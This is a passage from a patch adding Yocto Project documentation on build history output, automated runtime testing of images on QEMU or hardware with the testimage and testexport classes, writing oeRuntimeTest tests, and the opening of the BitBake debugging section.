+Here is an example of ``image-info.txt``:
+
+.. code-block:: none
+
+   DISTRO = poky
+   DISTRO_VERSION = 1.7
+   USER_CLASSES = buildstats image-mklibs image-prelink
+   IMAGE_CLASSES = image_types
+   IMAGE_FEATURES = debug-tweaks
+   IMAGE_LINGUAS =
+   IMAGE_INSTALL = packagegroup-core-boot run-postinsts
+   BAD_RECOMMENDATIONS =
+   NO_RECOMMENDATIONS =
+   PACKAGE_EXCLUDE =
+   ROOTFS_POSTPROCESS_COMMAND = write_package_manifest; license_create_manifest; \
+      write_image_manifest ; buildhistory_list_installed_image ; \
+      buildhistory_get_image_installed ; ssh_allow_empty_password;  \
+      postinst_enable_logging; rootfs_update_timestamp ; ssh_disable_dns_lookup ;
+   IMAGE_POSTPROCESS_COMMAND =   buildhistory_get_imageinfo ;
+   IMAGESIZE = 6900
+
+Other than ``IMAGESIZE``,
+which is the total size of the files in the image in Kbytes, the
+name-value pairs are variables that may have influenced the content of
+the image. This information is often useful when you are trying to
+determine why a change in the package or file listings has occurred.
+
+Using Build History to Gather Image Information Only
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As you can see, build history produces image information, including
+dependency graphs, so you can see why something was pulled into the
+image. If you are just interested in this information and not interested
+in collecting specific package or SDK information, you can enable
+writing only image information without any history by adding the
+following to your ``conf/local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+   INHERIT += "buildhistory"
+   BUILDHISTORY_COMMIT = "0"
+   BUILDHISTORY_FEATURES = "image"
+
+Here, you set the
+:term:`BUILDHISTORY_FEATURES`
+variable to use the image feature only.
+
+Build History SDK Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Build history collects similar information on the contents of SDKs (e.g.
+``bitbake -c populate_sdk imagename``) as compared to information it
+collects for images. Furthermore, this information differs depending on
+whether an extensible or standard SDK is being produced.
+
+The following list shows the files produced for SDKs:
+
+-  ``files-in-sdk.txt:`` A list of files in the SDK with permissions,
+   owner, group, size, and symlink information. This list includes both
+   the host and target parts of the SDK.
+
+-  ``sdk-info.txt:`` A text file containing name-value pairs with
+   information about the SDK. See the following listing example for more
+   information.
+
+-  ``sstate-task-sizes.txt:`` A text file containing name-value pairs
+   with information about task group sizes (e.g. ``do_populate_sysroot``
+   tasks have a total size). The ``sstate-task-sizes.txt`` file exists
+   only when an extensible SDK is created.
+
+-  ``sstate-package-sizes.txt:`` A text file containing name-value pairs
+   with information for the shared-state packages and sizes in the SDK.
+   The ``sstate-package-sizes.txt`` file exists only when an extensible
+   SDK is created.
+
+-  ``sdk-files:`` A folder that contains copies of the files mentioned
+   in ``BUILDHISTORY_SDK_FILES`` if the files are present in the output.
+   Additionally, the default value of ``BUILDHISTORY_SDK_FILES`` is
+   specific to the extensible SDK although you can set it differently if
+   you would like to pull in specific files from the standard SDK.
+
+   The default files are ``conf/local.conf``, ``conf/bblayers.conf``,
+   ``conf/auto.conf``, ``conf/locked-sigs.inc``, and
+   ``conf/devtool.conf``. Thus, for an extensible SDK, these files get
+   copied into the ``sdk-files`` directory.
+
+-  The following information appears under each of the ``host`` and
+   ``target`` directories for the portions of the SDK that run on the
+   host and on the target, respectively:
+
+   .. note::
+
+      The following files for the most part are empty when producing an
+      extensible SDK because this type of SDK is not constructed from
+      packages as is the standard SDK.
+
+   -  ``depends.dot:`` Dependency graph for the SDK that is compatible
+      with ``graphviz``.
+
+   -  ``installed-package-names.txt:`` A list of installed packages by
+      name only.
+
+   -  ``installed-package-sizes.txt:`` A list of installed packages
+      ordered by size.
+
+   -  ``installed-packages.txt:`` A list of installed packages with full
+      package filenames.
+
+Here is an example of ``sdk-info.txt``:
+
+.. code-block:: none
+
+   DISTRO = poky
+   DISTRO_VERSION = 1.3+snapshot-20130327
+   SDK_NAME = poky-glibc-i686-arm
+   SDK_VERSION = 1.3+snapshot
+   SDKMACHINE =
+   SDKIMAGE_FEATURES = dev-pkgs dbg-pkgs
+   BAD_RECOMMENDATIONS =
+   SDKSIZE = 352712
+
+Other than ``SDKSIZE``, which is
+the total size of the files in the SDK in Kbytes, the name-value pairs
+are variables that might have influenced the content of the SDK. This
+information is often useful when you are trying to determine why a
+change in the package or file listings has occurred.
+
+Examining Build History Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can examine build history output from the command line or from a web
+interface.
+
+To see any changes that have occurred (assuming you have
+:term:`BUILDHISTORY_COMMIT` = "1"),
+you can simply use any Git command that allows you to view the history
+of a repository. Here is one method:
+::
+
+   $ git log -p
+
+You need to realize,
+however, that this method does show changes that are not significant
+(e.g. a package's size changing by a few bytes).
+
+A command-line tool called ``buildhistory-diff`` does exist, though,
+that queries the Git repository and prints just the differences that
+might be significant in human-readable form. Here is an example:
+::
+
+   $ ~/poky/poky/scripts/buildhistory-diff . HEAD^
+   Changes to images/qemux86_64/glibc/core-image-minimal (files-in-image.txt):
+      /etc/anotherpkg.conf was added
+      /sbin/anotherpkg was added
+      * (installed-package-names.txt):
+      *   anotherpkg was added
+   Changes to images/qemux86_64/glibc/core-image-minimal (installed-package-names.txt):
+      anotherpkg was added
+   packages/qemux86_64-poky-linux/v86d: PACKAGES: added "v86d-extras"
+      * PR changed from "r0" to "r1"
+      * PV changed from "0.1.10" to "0.1.12"
+   packages/qemux86_64-poky-linux/v86d/v86d: PKGSIZE changed from 110579 to 144381 (+30%)
+      * PR changed from "r0" to "r1"
+      * PV changed from "0.1.10" to "0.1.12"
+
+.. note::
+
+   The ``buildhistory-diff`` tool requires the ``GitPython``
+   package. Be sure to install it using Pip3 as follows:
+   ::
+
+         $ pip3 install GitPython --user
+
+
+   Alternatively, you can install ``python3-git`` using the appropriate
+   distribution package manager (e.g. ``apt-get``, ``dnf``, or ``zipper``).
+
+To see changes to the build history using a web interface, follow the
+instruction in the ``README`` file
+:yocto_git:`here </cgit/cgit.cgi/buildhistory-web/>`.
+
+Here is a sample screenshot of the interface:
+
+.. image:: figures/buildhistory-web.png
+   :align: center
+
+Performing Automated Runtime Testing
+====================================
+
+The OpenEmbedded build system makes available a series of automated
+tests for images to verify runtime functionality. You can run these
+tests on either QEMU or actual target hardware. Tests are written in
+Python making use of the ``unittest`` module, and the majority of them
+run commands on the target system over SSH. This section describes how
+you set up the environment to use these tests, run available tests, and
+write and add your own tests.
+
+For information on the test and QA infrastructure available within the
+Yocto Project, see the ":ref:`ref-manual/ref-release-process:testing and quality assurance`"
+section in the Yocto Project Reference Manual.
+
+Enabling Tests
+--------------
+
+Depending on whether you are planning to run tests using QEMU or on the
+hardware, you have to take different steps to enable the tests. See the
+following subsections for information on how to enable both types of
+tests.
+
+.. _qemu-image-enabling-tests:
+
+Enabling Runtime Tests on QEMU
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In order to run tests, you need to do the following:
+
+-  *Set up to avoid interaction with sudo for networking:* To
+   accomplish this, you must do one of the following:
+
+   -  Add ``NOPASSWD`` for your user in ``/etc/sudoers`` either for all
+      commands or just for ``runqemu-ifup``. You must provide the full
+      path as that can change if you are using multiple clones of the
+      source repository.
+
+      .. note::
+
+         On some distributions, you also need to comment out "Defaults
+         requiretty" in ``/etc/sudoers``.
+
+   -  Manually configure a tap interface for your system.
+
+   -  Run as root the script in ``scripts/runqemu-gen-tapdevs``, which
+      should generate a list of tap devices. This is the option
+      typically chosen for Autobuilder-type environments.
+
+      .. note::
+
+         -  Be sure to use an absolute path when calling this script
+            with sudo.
+
+         -  Ensure that your host has the package ``iptables`` installed.
+
+         -  The package recipe ``qemu-helper-native`` is required to run
+            this script. Build the package using the following command:
+            ::
+
+               $ bitbake qemu-helper-native
+
+-  *Set the DISPLAY variable:* You need to set this variable so that
+   you have an X server available (e.g. start ``vncserver`` for a
+   headless machine).
+
+-  *Be sure your host's firewall accepts incoming connections from
+   192.168.7.0/24:* Some of the tests (in particular DNF tests) start an
+   HTTP server on a random high number port, which is used to serve
+   files to the target. The DNF module serves
+   ``${WORKDIR}/oe-rootfs-repo`` so it can run DNF channel commands.
+   That means your host's firewall must accept incoming connections from
+   192.168.7.0/24, which is the default IP range used for tap devices by
+   ``runqemu``.
+
+-  *Be sure your host has the correct packages installed:* Depending
+   your host's distribution, you need to have the following packages
+   installed:
+
+   -  Ubuntu and Debian: ``sysstat`` and ``iproute2``
+
+   -  OpenSUSE: ``sysstat`` and ``iproute2``
+
+   -  Fedora: ``sysstat`` and ``iproute``
+
+   -  CentOS: ``sysstat`` and ``iproute``
+
+Once you start running the tests, the following happens:
+
+1. A copy of the root filesystem is written to ``${WORKDIR}/testimage``.
+
+2. The image is booted under QEMU using the standard ``runqemu`` script.
+
+3. A default timeout of 500 seconds occurs to allow for the boot process
+   to reach the login prompt. You can change the timeout period by
+   setting
+   :term:`TEST_QEMUBOOT_TIMEOUT`
+   in the ``local.conf`` file.
+
+4. Once the boot process is reached and the login prompt appears, the
+   tests run. The full boot log is written to
+   ``${WORKDIR}/testimage/qemu_boot_log``.
+
+5. Each test module loads in the order found in ``TEST_SUITES``. You can
+   find the full output of the commands run over SSH in
+   ``${WORKDIR}/testimgage/ssh_target_log``.
+
+6. If no failures occur, the task running the tests ends successfully.
+   You can find the output from the ``unittest`` in the task log at
+   ``${WORKDIR}/temp/log.do_testimage``.
+
+.. _hardware-image-enabling-tests:
+
+Enabling Runtime Tests on Hardware
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The OpenEmbedded build system can run tests on real hardware, and for
+certain devices it can also deploy the image to be tested onto the
+device beforehand.
+
+For automated deployment, a "master image" is installed onto the
+hardware once as part of setup. Then, each time tests are to be run, the
+following occurs:
+
+1. The master image is booted into and used to write the image to be
+   tested to a second partition.
+
+2. The device is then rebooted using an external script that you need to
+   provide.
+
+3. The device boots into the image to be tested.
+
+When running tests (independent of whether the image has been deployed
+automatically or not), the device is expected to be connected to a
+network on a pre-determined IP address. You can either use static IP
+addresses written into the image, or set the image to use DHCP and have
+your DHCP server on the test network assign a known IP address based on
+the MAC address of the device.
+
+In order to run tests on hardware, you need to set ``TEST_TARGET`` to an
+appropriate value. For QEMU, you do not have to change anything, the
+default value is "qemu". For running tests on hardware, the following
+options exist:
+
+-  *"simpleremote":* Choose "simpleremote" if you are going to run tests
+   on a target system that is already running the image to be tested and
+   is available on the network. You can use "simpleremote" in
+   conjunction with either real hardware or an image running within a
+   separately started QEMU or any other virtual machine manager.
+
+-  *"SystemdbootTarget":* Choose "SystemdbootTarget" if your hardware is
+   an EFI-based machine with ``systemd-boot`` as bootloader and
+   ``core-image-testmaster`` (or something similar) is installed. Also,
+   your hardware under test must be in a DHCP-enabled network that gives
+   it the same IP address for each reboot.
+
+   If you choose "SystemdbootTarget", there are additional requirements
+   and considerations. See the "`Selecting
+   SystemdbootTarget <#selecting-systemdboottarget>`__" section, which
+   follows, for more information.
+
+-  *"BeagleBoneTarget":* Choose "BeagleBoneTarget" if you are deploying
+   images and running tests on the BeagleBone "Black" or original
+   "White" hardware. For information on how to use these tests, see the
+   comments at the top of the BeagleBoneTarget
+   ``meta-yocto-bsp/lib/oeqa/controllers/beaglebonetarget.py`` file.
+
+-  *"EdgeRouterTarget":* Choose "EdgeRouterTarget" if you are deploying
+   images and running tests on the Ubiquiti Networks EdgeRouter Lite.
+   For information on how to use these tests, see the comments at the
+   top of the EdgeRouterTarget
+   ``meta-yocto-bsp/lib/oeqa/controllers/edgeroutertarget.py`` file.
+
+-  *"GrubTarget":* Choose "GrubTarget" if you are deploying images and running
+   tests on any generic PC that boots using GRUB. For information on how
+   to use these tests, see the comments at the top of the GrubTarget
+   ``meta-yocto-bsp/lib/oeqa/controllers/grubtarget.py`` file.
+
+-  *"your-target":* Create your own custom target if you want to run
+   tests when you are deploying images and running tests on a custom
+   machine within your BSP layer. To do this, you need to add a Python
+   unit that defines the target class under ``lib/oeqa/controllers/``
+   within your layer. You must also provide an empty ``__init__.py``.
+   For examples, see files in ``meta-yocto-bsp/lib/oeqa/controllers/``.
+
+Selecting SystemdbootTarget
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you did not set ``TEST_TARGET`` to "SystemdbootTarget", then you do
+not need any information in this section. You can skip down to the
+"`Running Tests <#qemu-image-running-tests>`__" section.
+
+If you did set ``TEST_TARGET`` to "SystemdbootTarget", you also need to
+perform a one-time setup of your master image by doing the following:
+
+1. *Set EFI_PROVIDER:* Be sure that ``EFI_PROVIDER`` is as follows:
+   ::
+
+      EFI_PROVIDER = "systemd-boot"
+
+2. *Build the master image:* Build the ``core-image-testmaster`` image.
+   The ``core-image-testmaster`` recipe is provided as an example for a
+   "master" image and you can customize the image recipe as you would
+   any other recipe.
+
+   Here are the image recipe requirements:
+
+   -  Inherits ``core-image`` so that kernel modules are installed.
+
+   -  Installs normal linux utilities not busybox ones (e.g. ``bash``,
+      ``coreutils``, ``tar``, ``gzip``, and ``kmod``).
+
+   -  Uses a custom Initial RAM Disk (initramfs) image with a custom
+      installer. A normal image that you can install usually creates a
+      single rootfs partition. This image uses another installer that
+      creates a specific partition layout. Not all Board Support
+      Packages (BSPs) can use an installer. For such cases, you need to
+      manually create the following partition layout on the target:
+
+      -  First partition mounted under ``/boot``, labeled "boot".
+
+      -  The main rootfs partition where this image gets installed,
+         which is mounted under ``/``.
+
+      -  Another partition labeled "testrootfs" where test images get
+         deployed.
+
+3. *Install image:* Install the image that you just built on the target
+   system.
+
+The final thing you need to do when setting ``TEST_TARGET`` to
+"SystemdbootTarget" is to set up the test image:
+
+1. *Set up your local.conf file:* Make sure you have the following
+   statements in your ``local.conf`` file:
+   ::
+
+      IMAGE_FSTYPES += "tar.gz"
+      INHERIT += "testimage"
+      TEST_TARGET = "SystemdbootTarget"
+      TEST_TARGET_IP = "192.168.2.3"
+
+2. *Build your test image:* Use BitBake to build the image:
+   ::
+
+      $ bitbake core-image-sato
+
+Power Control
+~~~~~~~~~~~~~
+
+For most hardware targets other than "simpleremote", you can control
+power:
+
+-  You can use ``TEST_POWERCONTROL_CMD`` together with
+   ``TEST_POWERCONTROL_EXTRA_ARGS`` as a command that runs on the host
+   and does power cycling. The test code passes one argument to that
+   command: off, on or cycle (off then on). Here is an example that
+   could appear in your ``local.conf`` file:
+   ::
+
+      TEST_POWERCONTROL_CMD = "powercontrol.exp test 10.11.12.1 nuc1"
+
+   In this example, the expect
+   script does the following:
+
+   .. code-block:: shell
+
+      ssh test@10.11.12.1 "pyctl nuc1 arg"
+
+   It then runs a Python script that controls power for a label called
+   ``nuc1``.
+
+   .. note::
+
+      You need to customize ``TEST_POWERCONTROL_CMD`` and
+      ``TEST_POWERCONTROL_EXTRA_ARGS`` for your own setup. The one requirement
+      is that it accepts "on", "off", and "cycle" as the last argument.
+
+-  When no command is defined, it connects to the device over SSH and
+   uses the classic reboot command to reboot the device. Classic reboot
+   is fine as long as the machine actually reboots (i.e. the SSH test
+   has not failed). It is useful for scenarios where you have a simple
+   setup, typically with a single board, and where some manual
+   interaction is okay from time to time.
+
+If you have no hardware to automatically perform power control but still
+wish to experiment with automated hardware testing, you can use the
+``dialog-power-control`` script that shows a dialog prompting you to perform
+the required power action. This script requires either KDialog or Zenity
+to be installed. To use this script, set the
+:term:`TEST_POWERCONTROL_CMD`
+variable as follows:
+::
+
+   TEST_POWERCONTROL_CMD = "${COREBASE}/scripts/contrib/dialog-power-control"
+
+Serial Console Connection
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For test target classes requiring a serial console to interact with the
+bootloader (e.g. BeagleBoneTarget, EdgeRouterTarget, and GrubTarget),
+you need to specify a command to use to connect to the serial console of
+the target machine by using the
+:term:`TEST_SERIALCONTROL_CMD`
+variable and optionally the
+:term:`TEST_SERIALCONTROL_EXTRA_ARGS`
+variable.
+
+These cases could be a serial terminal program if the machine is
+connected to a local serial port, or a ``telnet`` or ``ssh`` command
+connecting to a remote console server. Regardless of the case, the
+command simply needs to connect to the serial console and forward that
+connection to standard input and output as any normal terminal program
+does. For example, to use the picocom terminal program on serial device
+``/dev/ttyUSB0`` at 115200bps, you would set the variable as follows:
+::
+
+   TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
+
+For local
+devices where the serial port device disappears when the device reboots,
+an additional "serdevtry" wrapper script is provided. To use this
+wrapper, simply prefix the terminal command with
+``${COREBASE}/scripts/contrib/serdevtry``:
+::
+
+   TEST_SERIALCONTROL_CMD = "${COREBASE}/scripts/contrib/serdevtry picocom -b 115200 /dev/ttyUSB0"
+
+.. _qemu-image-running-tests:
+
+Running Tests
+-------------
+
+You can start the tests automatically or manually:
+
+-  *Automatically running tests:* To run the tests automatically after
+   the OpenEmbedded build system successfully creates an image, first
+   set the
+   :term:`TESTIMAGE_AUTO`
+   variable to "1" in your ``local.conf`` file in the
+   :term:`Build Directory`:
+   ::
+
+      TESTIMAGE_AUTO = "1"
+
+   Next, build your image. If the image successfully builds, the
+   tests run:
+   ::
+
+      bitbake core-image-sato
+
+-  *Manually running tests:* To manually run the tests, first globally
+   inherit the
+   :ref:`testimage <ref-classes-testimage*>` class
+   by editing your ``local.conf`` file:
+   ::
+
+      INHERIT += "testimage"
+
+   Next, use BitBake to run the tests:
+   ::
+
+      bitbake -c testimage image
+
+All test files reside in ``meta/lib/oeqa/runtime`` in the
+:term:`Source Directory`. A test name maps
+directly to a Python module. Each test module may contain a number of
+individual tests. Tests are usually grouped together by the area tested
+(e.g tests for systemd reside in ``meta/lib/oeqa/runtime/systemd.py``).
+
+You can add tests to any layer provided you place them in the proper
+area and you extend :term:`BBPATH` in
+the ``local.conf`` file as normal. Be sure that tests reside in
+``layer/lib/oeqa/runtime``.
+
+.. note::
+
+   Be sure that module names do not collide with module names used in
+   the default set of test modules in ``meta/lib/oeqa/runtime``.
+
+You can change the set of tests run by appending or overriding
+:term:`TEST_SUITES` variable in
+``local.conf``. Each name in ``TEST_SUITES`` represents a required test
+for the image. Test modules named within ``TEST_SUITES`` cannot be
+skipped even if a test is not suitable for an image (e.g. running the
+RPM tests on an image without ``rpm``). Appending "auto" to
+``TEST_SUITES`` causes the build system to try to run all tests that are
+suitable for the image (i.e. each test module may elect to skip itself).
+
+The order you list tests in ``TEST_SUITES`` is important and influences
+test dependencies. Consequently, tests that depend on other tests should
+be added after the test on which they depend. For example, since the
+``ssh`` test depends on the ``ping`` test, "ssh" needs to come after
+"ping" in the list. The test class provides no re-ordering or dependency
+handling.
+
+.. note::
+
+   Each module can have multiple classes with multiple test methods.
+   And, Python ``unittest`` rules apply.
+
+Here are some things to keep in mind when running tests:
+
+-  The default tests for the image are defined as:
+   ::
+
+      DEFAULT_TEST_SUITES_pn-image = "ping ssh df connman syslog xorg scp vnc date rpm dnf dmesg"
+
+-  Add your own test to the list of the by using the following:
+   ::
+
+      TEST_SUITES_append = " mytest"
+
+-  Run a specific list of tests as follows:
+   ::
+
+     TEST_SUITES = "test1 test2 test3"
+
+   Remember, order is important. Be sure to place a test that is
+   dependent on another test later in the order.
+
+Exporting Tests
+---------------
+
+You can export tests so that they can run independently of the build
+system. Exporting tests is required if you want to be able to hand the
+test execution off to a scheduler. You can only export tests that are
+defined in :term:`TEST_SUITES`.
+
+If your image is already built, make sure the following are set in your
+``local.conf`` file:
+::
+
+   INHERIT += "testexport"
+   TEST_TARGET_IP = "IP-address-for-the-test-target"
+   TEST_SERVER_IP = "IP-address-for-the-test-server"
+
+You can then export the tests with the
+following BitBake command form:
+::
+
+   $ bitbake image -c testexport
+
+Exporting the tests places them in the
+:term:`Build Directory` in
+``tmp/testexport/``\ image, which is controlled by the
+``TEST_EXPORT_DIR`` variable.
+
+You can now run the tests outside of the build environment:
+::
+
+   $ cd tmp/testexport/image
+   $ ./runexported.py testdata.json
+
+Here is a complete example that shows IP addresses and uses the
+``core-image-sato`` image:
+::
+
+   INHERIT += "testexport"
+   TEST_TARGET_IP = "192.168.7.2"
+   TEST_SERVER_IP = "192.168.7.1"
+
+Use BitBake to export the tests:
+::
+
+   $ bitbake core-image-sato -c testexport
+
+Run the tests outside of
+the build environment using the following:
+::
+
+   $ cd tmp/testexport/core-image-sato
+   $ ./runexported.py testdata.json
+
+.. _qemu-image-writing-new-tests:
+
+Writing New Tests
+-----------------
+
+As mentioned previously, all new test files need to be in the proper
+place for the build system to find them. New tests for additional
+functionality outside of the core should be added to the layer that adds
+the functionality, in ``layer/lib/oeqa/runtime`` (as long as
+:term:`BBPATH` is extended in the
+layer's ``layer.conf`` file as normal). Just remember the following:
+
+-  Filenames need to map directly to test (module) names.
+
+-  Do not use module names that collide with existing core tests.
+
+-  Minimally, an empty ``__init__.py`` file must exist in the runtime
+   directory.
+
+To create a new test, start by copying an existing module (e.g.
+``syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use
+code from ``meta/lib/oeqa/utils``, which are helper classes.
+
+.. note::
+
+   Structure shell commands such that you rely on them and they return a
+   single code for success. Be aware that sometimes you will need to
+   parse the output. See the ``df.py`` and ``date.py`` modules for examples.
+
+You will notice that all test classes inherit ``oeRuntimeTest``, which
+is found in ``meta/lib/oetest.py``. This base class offers some helper
+attributes, which are described in the following sections:
+
+.. _qemu-image-writing-tests-class-methods:
+
+Class Methods
+~~~~~~~~~~~~~
+
+Class methods are as follows:
+
+-  *hasPackage(pkg):* Returns "True" if ``pkg`` is in the installed
+   package list of the image, which is based on the manifest file that
+   is generated during the ``do_rootfs`` task.
+
+-  *hasFeature(feature):* Returns "True" if the feature is in
+   :term:`IMAGE_FEATURES` or
+   :term:`DISTRO_FEATURES`.
+
+.. _qemu-image-writing-tests-class-attributes:
+
+Class Attributes
+~~~~~~~~~~~~~~~~
+
+Class attributes are as follows:
+
+-  *pscmd:* Equals "ps -ef" if ``procps`` is installed in the image.
+   Otherwise, ``pscmd`` equals "ps" (busybox).
+
+-  *tc:* The called test context, which gives access to the
+   following attributes:
+
+   -  *d:* The BitBake datastore, which allows you to use stuff such
+      as ``oeRuntimeTest.tc.d.getVar("VIRTUAL-RUNTIME_init_manager")``.
+
+   -  *testslist and testsrequired:* Used internally. The tests
+      do not need these.
+
+   -  *filesdir:* The absolute path to
+      ``meta/lib/oeqa/runtime/files``, which contains helper files for
+      tests meant for copying on the target such as small files written
+      in C for compilation.
+
+   -  *target:* The target controller object used to deploy and
+      start an image on a particular target (e.g. Qemu, SimpleRemote,
+      and SystemdbootTarget). Tests usually use the following:
+
+      -  *ip:* The target's IP address.
+
+      -  *server_ip:* The host's IP address, which is usually used
+         by the DNF test suite.
+
+      -  *run(cmd, timeout=None):* The single, most used method.
+         This command is a wrapper for: ``ssh root@host "cmd"``. The
+         command returns a tuple: (status, output), which are what their
+         names imply - the return code of "cmd" and whatever output it
+         produces. The optional timeout argument represents the number
+         of seconds the test should wait for "cmd" to return. If the
+         argument is "None", the test uses the default instance's
+         timeout period, which is 300 seconds. If the argument is "0",
+         the test runs until the command returns.
+
+      -  *copy_to(localpath, remotepath):*
+         ``scp localpath root@ip:remotepath``.
+
+      -  *copy_from(remotepath, localpath):*
+         ``scp root@host:remotepath localpath``.
+
+.. _qemu-image-writing-tests-instance-attributes:
+
+Instance Attributes
+~~~~~~~~~~~~~~~~~~~
+
+A single instance attribute exists, which is ``target``. The ``target``
+instance attribute is identical to the class attribute of the same name,
+which is described in the previous section. This attribute exists as
+both an instance and class attribute so tests can use
+``self.target.run(cmd)`` in instance methods instead of
+``oeRuntimeTest.tc.target.run(cmd)``.
+
+Installing Packages in the DUT Without the Package Manager
+----------------------------------------------------------
+
+When a test requires a package built by BitBake, it is possible to
+install that package. Installing the package does not require a package
+manager be installed in the device under test (DUT). It does, however,
+require an SSH connection and the target must be using the
+``sshcontrol`` class.
+
+.. note::
+
+   This method uses ``scp`` to copy files from the host to the target, which
+   causes permissions and special attributes to be lost.
+
+A JSON file is used to define the packages needed by a test. This file
+must be in the same path as the file used to define the tests.
+Furthermore, the filename must map directly to the test module name with
+a ``.json`` extension.
+
+The JSON file must include an object with the test name as keys of an
+object or an array. This object (or array of objects) uses the following
+data:
+
+-  "pkg" - A mandatory string that is the name of the package to be
+   installed.
+
+-  "rm" - An optional boolean, which defaults to "false", that specifies
+   to remove the package after the test.
+
+-  "extract" - An optional boolean, which defaults to "false", that
+   specifies if the package must be extracted from the package format.
+   When set to "true", the package is not automatically installed into
+   the DUT.
+
+Following is an example JSON file that handles test "foo" installing
+package "bar" and test "foobar" installing packages "foo" and "bar".
+Once the test is complete, the packages are removed from the DUT.
+::
+
+     {
+         "foo": {
+             "pkg": "bar"
+         },
+         "foobar": [
+             {
+                 "pkg": "foo",
+                 "rm": true
+             },
+             {
+                 "pkg": "bar",
+                 "rm": true
+             }
+         ]
+     }
+
+.. _usingpoky-debugging-tools-and-techniques:
+
+Debugging Tools and Techniques
+==============================
+
+The exact method for debugging build failures depends on the nature of
+the problem and on the system's area from which the bug originates.
+Standard debugging practices such as comparison against the last known
+working version with examination of the changes and the re-application
+of steps to identify the one causing the problem are valid for the Yocto
+Project just as they are for any other system. Even though it is
+impossible to detail every possible potential failure, this section
+provides some general tips to aid in debugging given a variety of
+situations.
+
+.. note::
+
+   A useful feature for debugging is the error reporting tool.
+   Configuring the Yocto Project to use this tool causes the
+   OpenEmbedded build system to produce error reporting commands as part
+   of the console output. You can enter the commands after the build
+   completes to log error information into a common database, that can
+   help you figure out what might be going wrong. For information on how
+   to enable and use this feature, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:using the error reporting tool`"
+   section.
+
+The following list shows the debugging topics in the remainder of this
+section:
+
+-  "`Viewing Logs from Failed
+   Tasks <#dev-debugging-viewing-logs-from-failed-tasks>`__" describes
+   how to find and view logs from tasks that failed during the build
+   process.
+
+-  "`Viewing Variable
+   Values <#dev-debugging-viewing-variable-values>`__" describes how to
+   use the BitBake ``-e`` option to examine variable values after a
+   recipe has been parsed.
+
+-  ":ref:`dev-manual/dev-manual-common-tasks:viewing package information with \`\`oe-pkgdata-util\`\``"
+   describes how to use the ``oe-pkgdata-util`` utility to query
+   :term:`PKGDATA_DIR` and
+   display package-related information for built packages.
+
+-  "`Viewing Dependencies Between Recipes and
+   Tasks <#dev-viewing-dependencies-between-recipes-and-tasks>`__"
+   describes how to use the BitBake ``-g`` option to display recipe
+   dependency information used during the build.
+
+-  "`Viewing Task Variable
+   Dependencies <#dev-viewing-task-variable-dependencies>`__" describes
+   how to use the ``bitbake-dumpsig`` command in conjunction with key
+   subdirectories in the
+   :term:`Build Directory` to determine
+   variable dependencies.
+
+-  "`Running Specific Tasks <#dev-debugging-taskrunning>`__" describes
+   how to use several BitBake options (e.g. ``-c``, ``-C``, and ``-f``)
+   to run specific tasks in the build chain. It can be useful to run
+   tasks "out-of-order" when trying isolate build issues.
+
+-  "`General BitBake Problems <#dev-debugging-bitbake>`__" describes how
+   to use BitBake's ``-D`` debug output option to reveal more about what
+   BitBake is doing during the build.
+
+-  "`Building with No Dependencies <#dev-debugging-buildfile>`__"
+   describes how to use the BitBake ``-b`` option to build a recipe
+   while ignoring dependencies.
+
+-  "`Recipe Logging Mechanisms <#recipe-logging-mechanisms>`__"
+   describes how to use the many recipe logging functions to produce
+   debugging output and report errors and warnings.
+
+-  "`Debugging Parallel Make Races <#debugging-parallel-make-races>`__"
+   describes how to debug situations where the build consists of several
+   parts that are run simultaneously and when the output or result of
+   one part is not ready for use with a different part of the build that
+   depends on that output.
+
+-  "`Debugging With the GNU Project Debugger (GDB)
+   Remotely <#platdev-gdb-remotedebug>`__" describes how to use GDB to
+   allow you to examine running programs, which can help you fix
+   problems.
+
+-  "`Debugging with the GNU Project Debugger (GDB) on the
+   Target <#debugging-with-the-gnu-project-debugger-gdb-on-the-target>`__"
+   describes how to use GDB directly on target hardware for debugging.
+
+-  "`Other Debugging Tips <#dev-other-debugging-others>`__" describes
+   miscellaneous debugging tips that can be useful.
+
+.. _dev-debugging-viewing-logs-from-failed-tasks:
+
+Viewing Logs from Failed Tasks
+------------------------------
+
+You can find the log for a task in the file
+``${``\ :term:`WORKDIR`\ ``}/temp/log.do_``\ `taskname`.
+For example, the log for the
+:ref:`ref-tasks-compile` task of the
+QEMU minimal image for the x86 machine (``qemux86``) might be in
+``tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/temp/log.do_compile``.
+To see the commands :term:`BitBake` ran
+to generate a log, look at the corresponding ``run.do_``\ `taskname` file
+in the same directory.
+
+``log.do_``\ `taskname` and ``run.do_``\ `taskname` are actually symbolic
+links to ``log.do_``\ `taskname`\ ``.``\ `pid` and
+``log.run_``\ `taskname`\ ``.``\ `pid`, where `pid` is the PID the task had
+when it ran. The symlinks always point to the files corresponding to the
+most recent run.
+
+.. _dev-debugging-viewing-variable-values:
+
+Viewing Variable Values
+-----------------------
+
+Sometimes you need to know the value of a variable as a result of
+BitBake's parsing step. This could be because some unexpected behavior
+occurred in your project. Perhaps an attempt to :ref:`modify a variable
+<bitbake:bitbake-user-manual/bitbake-user-manual-metadata:modifying existing
+variables>` did not work out as expected.
+
+BitBake's ``-e`` option is used to display variable values after
+parsing. The following command displays the variable values after the
+configuration files (i.e. ``local.conf``, ``bblayers.conf``,
+``bitbake.conf`` and so forth) have been parsed:
+::
+
+   $ bitbake -e
+
+The following command displays variable values after a specific recipe has
+been parsed. The variables include those from the configuration as well:
+::
+
+   $ bitbake -e recipename
+
+.. note::
+
+   Each recipe has its own private set of variables (datastore).
+   Internally, after parsing the configuration, a copy of the resulting
+   datastore is made prior to parsing each recipe. This copying implies
+   that variables set in one recipe will not be visible to other
+   recipes.
+
+   Likewise, each task within a recipe gets a private datastore based on
+   the recipe datastore, which means that variables set within one task
+   will not be visible to other tasks.
+
+In the output of ``bitbake -e``, each variable is preceded by a
+description of how the variable got its value, including temporary
